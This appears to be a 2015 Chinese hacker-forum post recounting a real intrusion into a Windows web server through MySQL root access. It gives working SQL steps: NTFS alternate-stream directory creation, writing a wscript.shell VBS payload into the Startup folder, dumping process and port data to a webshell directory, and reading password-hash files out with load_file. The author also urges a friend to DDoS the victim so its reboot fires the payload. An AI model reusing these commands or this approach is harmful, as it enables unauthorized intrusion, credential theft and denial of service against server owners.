##########################################
# Title :鸡肋提权之变态root利用
# Time :2015年4月12日
# Team :ihonker Team
# Author : Binghe
# 首发 : 本人原创技术博客文章投稿至 ihonker.org
#######################################
我来投稿,给红盟加加油
唉,这星期电脑被扣了,木法学习了,没法干活了。。。。特么刚到学校没几天,火龙童鞋就找我了,火急火燎。。。
你急有毛用,我电脑没带,怎么搞? 联系了基友adminlm牛看看吧,他说有防护软件啥的,有root,无法UDF,于是我让他去Mof,经历一番周折,知道了,对mof目录也锁定了权限,无法用root导出mof文件到目录。。。卧槽,
由于我无法电脑操作,我又给他提供了一些思路,php无法调用ws组建,试试asp,后来听火龙瘠薄说整个服务器全都是phpweb的站点,。。提权陷入僵局。
后来喝了一杯82年的乐事冷静了一下,最后一招,写启动。。
于是让adminlm测试,他不知道再搞些什么东西,也听不懂我的思路,
。。。。我还是自己来吧。。。。
找个语文课的时间,啪。。,飞出来了。。。高二狗。。。
直接上传了一个udf.php,看了下情况
版本大于mysql5.0 dll要导出到mysql.exe目录\lib\plugin ,默认不存在\lib\plugin目录,需要用NTFS ads 引流来创建
[AppleScript] 纯文本查看 复制代码 select @@basedir;
//查找到mysql的目录 这里回显:D:\Huweishen.com\PHPWEB\MySQL Server 5.5
select 'It is dll' into dumpfile 'D:\\Huweishen.com\\PHPWEB\\MySQL Server 5.5\\lib::$INDEX_ALLOCATION';
//利用NTFS ADS创建lib目录 注意路径的替换。还有\换成\\
select 'It is dll' into dumpfile 'D:\\Huweishen.com\\PHPWEB\\MySQL Server 5.5\\lib\\plugin::$INDEX_ALLOCATION';
//利用NTFS ADS创建plugin目录
这样啊 adminlm来的时候已经创建了 已经存在目录
[AppleScript] 纯文本查看 复制代码 File 'D:\Huweishen.com\PHPWEB\MySQL Server 5.5\lib\plugin::$INDEX_ALLOCATION' already exists
导出试试看 估计不行 要不然adminlm、早拿下了
mof我也不测试哦了,估计也是不行 因为这个鸟东西在,护卫神!!
写启动项添加用户我也不测试了 万一上面有什么防护软件直接就阻止了
思路还有的,三行代码导hash,破解。ok
然后有人不服,你破解出来又如何,端口你知道????
哦,我不知道,但是我还是可以查。。。看操作吧
建表:
[AppleScript] 纯文本查看 复制代码 create table binghe (cmd text);
好了,我们创建了一个新的表,表名为binghe,表中只存放一个字段,字段名为cmd,为text文本。
在表中插入内容
[AppleScript] 纯文本查看 复制代码 insert into binghe values ("set wshshell=createobject (""wscript.shell"" ) " );
插入三行代码导出hash,三行代码不予公布,免得众人装逼
[AppleScript] 纯文本查看 复制代码 insert into binghe values ("b=wshshell.run (""c0de1 & c0de2 & code3"",0) " );
三行代码运行之后会在启动目录生成三个文件,到时候loadfile读取,然后本地破解就可以获得管理密码
那么如何获得端口号??
呵呵,这样来
先找到终端服务对应的pid 并将结果写入(>)shell目录的binghe.txt
[AppleScript] 纯文本查看 复制代码 insert into binghe values ("b=wshshell.run (""tasklist /svc | find "termservice">D:/wwwroot/adpcd.com/include/binghe.txt"",0) " );
注:这里的D:/wwwroot/adpcd.com/include/ 属于webshell目录
再来,查询端口服务,并将结果追加写入(>>)shell目录的binghe.txt
[AppleScript] 纯文本查看 复制代码 insert into binghe values ("b=wshshell.run (""netstat -ano>>D:/wwwroot/adpcd.com/include/binghe.txt"",0) " );
注:这里的D:/wwwroot/adpcd.com/include/ 属于webshell目录
看看我在shell上面的实际操作
这里打了性感的马赛克
来查一下是不是写进去了??
[AppleScript] 纯文本查看 复制代码 select * from binghe;
好了,一切完毕 开始导出到启动项
[AppleScript] 纯文本查看 复制代码 select * from binghe into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\binghe.vbs";
再来loadfile看看 应该写进去了
接下来的事就不是我的事情了
@火龙,交给你,你不是说你的朋友有多少多少G纯流量吗,狠狠地ddos,打到管理员他喊叔叔也不停,然后他就去重启服务器了,然后。。你懂得!
还是说下吧,重启之后,按照我的预想,会在D:/wwwroot/adpcd.com/include/这个目录下生成一个Binghe.txt(内容包括termservice进程服务的pid和端口细节及对应pid,会提权的人都知道这两个pid对比就会获得终端端口号) ,另外在启动目录会生成三个hash的文件,到时候你来找我,我去loadfile他的hash,命令如下:
[AppleScript] 纯文本查看 复制代码 select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file1') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe1.txt'
select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file2') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe2.txt'
select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file3') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe3.txt'
注:file1\file2\file3 分别为三个hash文件
额,这是最后的思路了,比较鸡肋。。。没有办法的办法
静待重启吧,时间问题。
另外谢谢adminlm大牛帮我测试,好机油,下次去找你玩哈
另外说一句,谁对我好我对谁好,火龙大哥帮过我不少,人要有感激之心,他有问题我当倾力解决。。。不说了,我该回去了 卧槽 还要翻墙进去。。别举报我!
| 
发表于 2015-4-12 15:21:11
